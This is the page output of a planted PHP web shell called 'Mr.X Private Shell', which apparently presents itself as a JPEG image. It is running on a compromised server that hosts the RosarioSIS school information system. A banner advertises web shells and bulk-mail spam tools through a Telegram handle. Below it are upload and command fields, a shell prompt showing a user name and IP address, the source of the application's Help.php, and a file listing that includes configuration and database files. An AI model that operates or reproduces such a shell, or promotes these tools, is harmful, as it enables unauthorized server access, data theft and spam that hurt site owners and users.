����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

eblama1@216.73.217.57: ~ $
<?php
/**
 * Help
 *
 * Generate the Help / Handbook PDF
 * Translated if locale/[code]/Help.php file exists
 * Based on user profile
 *
 * @package RosarioSIS
 */

require_once 'Warehouse.php';
require_once 'Menu.php';

require_once 'ProgramFunctions/Help.fnc.php';

$profiles = [
	'admin' => _( 'Administrator' ),
	'teacher' => _( 'Teacher' ),
	'parent' => _( 'Parent' ),
	'student' => _( 'Student' ),
];

if ( ! isset( $profiles[ User( 'PROFILE' ) ] ) )
{
	// User is not logged in, redirect to login screen.
	header( 'Location: index.php' );

	exit;
}

$title = $profiles[ User( 'PROFILE' ) ];

$handle = PDFStart(); ?>

<style>.header2{ font-size: larger; }</style>
<div class="header1">
	<h2><img src="assets/themes/<?php echo Preferences( 'THEME' ); ?>/logo.png" class="module-icon" />
		<?php echo sprintf( _( '%s Handbook' ), $title ); ?></h2>
</div>

<?php
$help = HelpLoad();

$old_modcat = '';

$non_core_modules = array_diff_key( $RosarioModules, array_flip( $RosarioCoreModules ) );

foreach ( (array) $help as $program => $value ) :

	// Zap programs which are not allowed.
	if ( $program !== 'default'
		&& ! AllowUse( $program ) )
	{
		continue;
	}

	$_REQUEST['modname'] = $program;

	if ( mb_strpos( $program, '/' ) )
	{
		$modcat = mb_substr( $program, 0, mb_strpos( $program, '/' ) );

		if ( ! $RosarioModules[ $modcat ] ) // Module not activated.
		{
			continue;
		}

		if ( $modcat != $old_modcat
			&& $modcat != 'Custom' ) : ?>

			<div style="page-break-after: always;"></div>

			<?php
				unset( $_ROSARIO['DrawHeader'] );

				$_ROSARIO['HeaderIcon'] = $modcat;

				$modcat_title = _( str_replace( '_', ' ',  $modcat ) );

				if ( in_array( $modcat, $non_core_modules ) )
				{
					$modcat_title = dgettext( $modcat, str_replace( '_', ' ',  $modcat ) );
				}

				if ( ! empty( $_ROSARIO['Menu'][ $modcat ]['title'] ) )
				{
					$modcat_title = $_ROSARIO['Menu'][ $modcat ]['title'];
				}

				DrawHeader( $modcat_title );
		endif;

		if ( $modcat != 'Custom' )
		{
			$old_modcat = $modcat;
		}
	}
?>

<div style="page-break-inside: avoid;">
	<h3>

<?php
	if ( $program == 'default' )
	{
		echo ParseMLField( Config( 'TITLE' ) ) . ' ' . ROSARIO_VERSION;
	}
	else
		echo ( ProgramTitle() == 'RosarioSIS' ? $program : ProgramTitle() );
?>

	</h3>
	<div class="header2">

<?php

	$help_text = GetHelpText( $program );

	echo $help_text;
?>

	</div>
</div>
<br />

<?php endforeach; ?>

<div class="center">
	<b><a href="https://www.rosariosis.org/">https://www.rosariosis.org/</a></b>
</div>

<?php

$_REQUEST['modname'] = '';

PDFStop( $handle );

Filemanager

Name Type Size Permission Actions
ProgramFunctions Folder 0755
assets Folder 0755
cgi-bin Folder 0755
classes Folder 0755
functions Folder 0755
locale Folder 0755
modules Folder 0755
plugins Folder 0755
.gitattributes File 483 B 0644
.gitignore File 5.08 KB 0644
Bottom.php File 3.84 KB 0644
CHANGES.md File 86.83 KB 0644
CHANGES_V1_2.md File 64.91 KB 0644
CHANGES_V3_4.md File 42.24 KB 0644
CHANGES_V5_6.md File 41.44 KB 0644
CHANGES_V7_8.md File 27.37 KB 0644
CONTRIBUTING.md File 2.87 KB 0644
COPYRIGHT File 403 B 0644
Gruntfile.js File 3.52 KB 0644
Help.php File 2.52 KB 0644
Help_en.php File 127.36 KB 0644
INSTALL.md File 8.33 KB 0644
INSTALL.pdf File 56.38 KB 0644
INSTALL_es.md File 9.05 KB 0644
INSTALL_es.pdf File 57.2 KB 0644
INSTALL_fr.md File 9.3 KB 0644
INSTALL_fr.pdf File 58.31 KB 0644
InstallDatabase.php File 5.63 KB 0644
LICENSE File 14.86 KB 0644
Menu.php File 2.55 KB 0644
Modules.php File 2.71 KB 0644
PasswordReset.php File 12.08 KB 0644
README.md File 6.12 KB 0644
README.pdf File 308.99 KB 0644
Side.php File 21.64 KB 0644
WHATS_NEW.md File 27.68 KB 0644
Warehouse.php File 23.67 KB 0644
apple-touch-icon.png File 4.32 KB 0644
composer.json File 363 B 0644
config.inc.php File 2.06 KB 0644
config.inc.sample.php File 2.05 KB 0644
database.inc.php File 22.12 KB 0644
diagnostic.php File 7.84 KB 0644
favicon.ico File 1.62 KB 0644
index.php File 16.54 KB 0644
package.json File 456 B 0644
rosariosis.sql File 131.01 KB 0644
rosariosis_es.sql File 14.95 KB 0644
rosariosis_fr.sql File 16.84 KB 0644
rosariosis_mysql.sql File 121.71 KB 0644
rosariosis_pt_BR.sql File 14.96 KB 0644